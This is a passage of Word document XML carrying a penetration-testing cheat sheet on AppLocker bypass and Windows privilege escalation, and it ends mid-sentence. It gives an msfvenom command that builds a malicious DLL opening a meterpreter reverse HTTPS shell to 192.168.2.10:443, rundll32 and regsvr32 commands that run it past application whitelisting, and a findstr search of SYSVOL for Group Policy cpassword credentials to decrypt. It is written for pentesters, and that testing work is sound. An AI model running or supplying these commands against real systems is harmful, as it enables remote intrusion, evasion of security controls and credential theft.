          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Password Spraying an OWA Portal blog post: </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.blackhillsinfosec.com/?p=5089</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A0153C">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0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>AppLocker Bypass</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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Secondary Execution</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When a running process starts up a second process, that second process is started by what is referred to as “secondary execution” and it is not detected by AppLocker. This means that AppLocker rules do not get applied.  In other words, it is a way to get an executable file to run even if it has NOT been explicitly allowed by AppLocker.  There are a couple of ways to accomplish secondary execution. The first is using RUNDLL32.EXE and the second is by using REGSVR32.EXE.  Examples of both are shown below.</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Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> utility to create a malicious DLL file. In this case the DLL file will make an outbound connection using HTTPS to a listening server on IP address 192.168.2.10:443.  The DLL file can be executed using either RUNDLL32.EXE or REGSVR32.EXE.</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 xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> –p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reverse_https</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  -f  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  LHOST=192.168.2.10  </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LPORT=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>443  &gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\temp\malicious.dll</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C:\Windows\System32\rundll32.exe C:\temp\malicious.dll,Control_RunDLL</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OR</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0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\&gt; regsvr32.exe  /s  /u  malicious.dll</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Another AppLocker bypass is to use InstallUtil.EXE to directly access .NET functions and fly under the AppLocker radar.  See “PowerShell w/o PowerShell” BHIS blog post referenced below.</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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Third-Party Command Shells</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">As a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pentester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, you may be prevented from running cmd.exe but you have other options.  You could try running a third-party command shell.  There are several out there but we have tested only one and it worked perfectly.  It is a command shell that comes with the open-source Windows-like operating system </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ReactOS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.  In the case that AppLocker rules prevent execution of the third-party shell, convert the executable to a DLL and use the RunDLL32.exe method described above. You can also download an already converted cmd.dll using the link to a post by Didier Stevens in the references.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A0153C">
      <w:pPr>
        <w:spacing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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4838700" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1" name="Picture 1" descr="https://blackhillsinfosec.com/wp-content/uploads/legacy/wvT9P-yS0E0v7TS5OrMDJnc9SFTRBLwjaps50BhjhOoxJ2KPc_RtQgPgPLdbVl6I5kiMK5LSvEWr5-NLNvNLatUVmgO8JeWaEF9AFlwPSOM1z62HE2CFe3p_LH-IbLE6v4OGk5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ackhillsinfosec.com/wp-content/uploads/legacy/wvT9P-yS0E0v7TS5OrMDJnc9SFTRBLwjaps50BhjhOoxJ2KPc_RtQgPgPLdbVl6I5kiMK5LSvEWr5-NLNvNLatUVmgO8JeWaEF9AFlwPSOM1z62HE2CFe3p_LH-IbLE6v4OGk5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2981325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A0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PowerShell without PowerShell – </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.blackhillsinfosec.com/?p=5257</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A0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App Whitelisting Bypass – </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A0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Open Source Windows-like OS – </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.reactos.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A0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Open Source Windows-like OS – </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/ReactOS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A0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How to convert EXE to DLL – </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://blog.didierstevens.com/2010/02/04/cmd-dll/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A0153C">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0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Privilege Escalation</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There are many great tools that we use all the time to help with privilege escalation within a Windows domain.</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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">GPP </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(Group Policy </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Preferences )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> was introduced by Microsoft in 2008.  One of the things often found in GPP preference files are encrypted privileged credentials in order to script administrative tasks. This became a problem because the static symmetric AES encryption key used for the password was published, so credentials found in the files can be easily decrypted. These credentials are definitely what we consider low hanging fruit and are one of the first things we check for on a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.  Here is how simple it is:</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lastRenderedPageBreak/>
        <w:t>Open up a command shell and run the following command:</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0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /S </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cpassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>logonserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sysvol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\*.xml</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If you get any hits that contain an encrypted looking value in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cpassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> property item just decrypt it to reveal the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cleartext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> password and try using the credentials.  Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gpp-decrypt.rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to decrypt.  You could also use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> module Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GPPPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or the Metasploit module </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gpp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> to find and decrypt in one shot.</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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A015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A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://blogs.technet.microsoft.com/grouppolicy/2009/04/22/passwords-in-group-policy-preferences-updated/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A015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A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://tools.kali.org/password-attacks/gpp-decrypt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A015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A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A015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A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.rapid7.com/db/modules/post/windows/gather/credentials/gpp</w:t>
        </w:r>
      </w:hyperlink>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A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PowerUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> will find common misconfigurations that could allow privilege escalation. This PowerShell script will check for misconfigurations like Weak Service Permissions, Unquoted Service Paths, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hijackable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> DLLs and other things.  We show how to run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PowerUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
